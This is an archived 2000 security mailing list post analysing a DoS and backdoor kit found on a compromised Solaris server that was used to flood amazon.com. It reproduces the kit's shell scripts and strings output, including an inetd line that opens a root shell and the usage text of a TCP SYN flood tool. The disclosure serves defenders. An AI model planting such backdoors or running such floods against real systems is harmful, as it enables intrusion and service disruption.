Security Incidents mailing list archives
Solaris DoS kit
From: Elias Levy <aleph1 () SECURITYFOCUS COM>
Date: Tue, 22 Aug 2000 12:35:29 -0700
[ This message is from an anonymous contributor ] This was used by a btinternet user against www.amazon.com via one of our Solaris 2.6 servers. Expect they got in via an old sadmind vulnerability which wasn't patched on a server which really should have been behind a firewall. Most of this is pretty uninteresting, wipe is just a utmp/wtmp wiper for example. The kit adds telnetd to /etc/inetd.conf, removes sadmind from /etc/rpc and adds it to /etc/init.d/rpc and installs a bogus sadmind binary which is used for denial of service attacks. The DoS type is spoofed source random tcp-high to tcp-high on target host. bash-2.01# tar tvf solkit.tar - -rw-r--r-- 0/0 109 Jul 1 08:50 2000 path.sh - -rw-r--r-- 0/0 34300 Jul 28 03:04 2000 sadmind - -rw-r--r-- 0/0 130 Jul 1 08:49 2000 secure.sh - -rw-r--r-- 0/0 6936 Jul 1 03:25 2000 set - -rw-r--r-- 0/0 29464 Jul 20 06:29 2000 stream - -rw-r--r-- 0/0 32560 Jul 1 03:25 2000 wipe bash-2.01# cat path.sh PATH=/bin:/usr/bin:/usr/sbin:usr/ucb/bin:/usr/local/bin:/usr/opt/local/bin:/usr/ccs/bin:/opt/public/bin:. ; bash-2.01# cat secure.sh kill -9 ` ps -ef | grep "/inetd -s /tmp" | awk '{print $2} '` kill -HUP `ps -ef | grep " /usr/sbin/inetd -s" | awk '{print $2} '` bash-2.01# strings sadmind - -csh fawking into background || coded by blazinweed || blazinweed () stoned com socket bind listen accept %s %s %s %s %s ld.so.1 wrong pass /bin/echo '%s stream tcp nowait root /bin/sh sh -i'> /tmp/.h;/usr/sbin/inetd -s /tmp/.h & ingreslock PONG Could not resolve %s. jess setsockopt flooding target bash-2.01# strings stream Usage: %s <dstaddr> <dstport> <pktsize> <pps> dstaddr - the target we are trying to attack. dstport - the port of the target, 0 = random. pktsize - the extra size to use. 0 = normal syn. Could not resolve %s. jess stream.c v1.0 - TCP Packet Storm socket setsockopt Resolving IPs... Sending... ----- End forwarded message ----- -- Elias Levy SecurityFocus.com http://www.securityfocus.com/ Si vis pacem, para bellum
Current thread:
- Solaris DoS kit Elias Levy (Aug 22)
- Re: Solaris DoS kit Max (Aug 22)